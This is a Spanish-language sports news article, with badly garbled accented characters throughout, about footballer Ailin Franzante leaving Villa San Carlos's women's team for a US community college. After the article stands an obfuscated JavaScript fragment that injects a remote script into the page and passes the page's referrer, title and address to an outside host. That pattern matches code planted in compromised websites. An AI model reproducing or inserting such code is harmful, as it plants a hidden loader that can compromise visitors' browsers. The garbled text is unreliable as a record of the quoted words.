De Villa San Carlos a NorteamAi??rica

La historia de Ailin Franzante, futbolista que representaba a Villa San Carlos, pero que continuarA? su carrera en el fA?tbol de Estados Unidos.Ai??


El fA?tbol femenino de la ‘Villa’ estA? dando que hablar. El equipo estA? puntero en la categorAi??a B, y el pasado fin de semana venciA? por cinco tantos contra cero a LujA?n como visitante. Pero la nota estuvo el fin de semana anterior, cuando el conjunto celeste recibiA? a su inmediato perseguidor, Sociedad Hebraica. AllAi?? se produjo la despedida de su zaguera central y capitana, AilAi??n Franzante. Nada mA?s y nada menos que Diego Armando Maradona se hizo presente en el estadio. A?Si! Diego Armando Maradona.

La joven futbolista abandona Argentina para estudiar una carrera en el extranjero. Obtuvo media beca para estudiar OsteopatAi??a, y a partir de ahora representarA? al equipo Southwest Mississipi Community College. No sA?lo se asegurA? un gran futuro en su vida profesional, sino que seguirA? jugando al fA?tbol, que es lo que ama y la mantiene viva.

“Lo vengo planeando desde el aAi??o pasado. Este aAi??o en mayo fueron las pruebas, Ai??a la semana recibAi?? propuestas de algunas universidades y elegAi?? una en Mississipi. Creo que iba a poder ir en diciembre, pero me adelantaron la fecha y bueno, tuve que elegir” manifestA? Ailin, contando como surgiA? esta idea de emigrar a Estados Unidos y continuar su vida en el paAi??s anglosajA?n.

Respecto a las sensaciones que sintiA? en su partido despedida ante Sociedad Hebraica, la marcadora central expresA?: “Lo tomAi?? como si fuera un partido que tenAi??amos que ganar, como cualquier otro.La verdad es que no caigo de nada, no lo sentAi?? como la A?ltima vez que iba a jugar con las chicas. Se que voy a tener revancha”.

La ex capitana del elenco de Berisso le contA? a ADN deportivo como es su relaciA?n con este hermoso deporte, cada vez mA?s practicado por las mujeres: “Juego en la ‘Villa’ hace tres aAi??os y medio. Antes sA?lo jugaba con mis compaAi??eros del colegio o en un balneario bastante futbolAi??stico en Mar del Plata. Pero siempre llevAi?? el fA?tbol en la sangre”.

Una capitana siempre es elegida por transmitirle algo a sus compaAi??eras: “La verdad que como capitana no se que transmito. SAi?? como persona, el compaAi??erismo, el contagio de buena energAi??a y principalmente la idea de que siempre hay algo mA?s para dar. Todos tenemos un extra y es lo que marca la diferencia. El apaciguar diferencias y que dejemos que ese sentimiento que tenemos todas por el fA?tbol nos una en los objetivos”.

Mauro CA?rdoba es el entrenador de las chicas de la ‘Villa’. Sin dudas, es muy diferente entrenar a un grupo de hombres, que a uno de mujeres. “Es destacable el compromiso que tiene Mauro con nosotras. Estar al frente de un plantel femenino es mucho mA?s difAi??cil Ai??que estar al frente de uno masculino. Los hombres juegan al fA?tbol desde chiquitos, y nosotras, o por lo menos en mi caso yo no. Entonces hay cosas bA?sicas que para el capaz que son normales, y a nosotras nos los tiene que explicar. Desde lo humano hay mucha diferencia con el fA?tbol de hombres, porque a nosotras nadie nos paga, hacemos esto por amor al fA?tbol. Esto se nota dentro y fuera de la cancha” resaltA? la jugadora antes de su partida.

AilAi??n se refiriA? al crecimiento del fA?tbol femenino en los A?ltimos aAi??os, y tambiAi??n a su difusiA?n: “Me parece que estA? teniendo bastante mA?s difusiA?n que hace un tiempo atrA?s. Y en la medida que crece, dentro de poco se va a escuchar hablar del fA?tbol femenino como algo mA?s presente. De igual manera el crecimiento de esta disciplina no depende sA?lo de los medios, sino de que nosotras nos hagamos escuchar”.

La futbolista platense se encontrarA? lejos de sus seres queridos por algA?n tiempo: “Voy a extraAi??ar el cariAi??o de mi familia, de mis amigos y mA?s que nada de mis compaAi??eras. Lo que me brindan acA? es A?nico. OjalA? lo que viene pueda parecerse a algo de lo tengo acA?”.

AilAi??n Franzante ya no estarA? presente en el primer equipo de Villa San Carlos, al menos por ahora. El jueves pasado partiA? desde Ezeiza hacia tierras norteamericanas. Sin dudas dejA? un sello en el equipo que le tocA? representar, que excede lo deportivo: un gran afecto con sus pares, y una calidad de persona que es la huella mA?s imborrable.

  x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}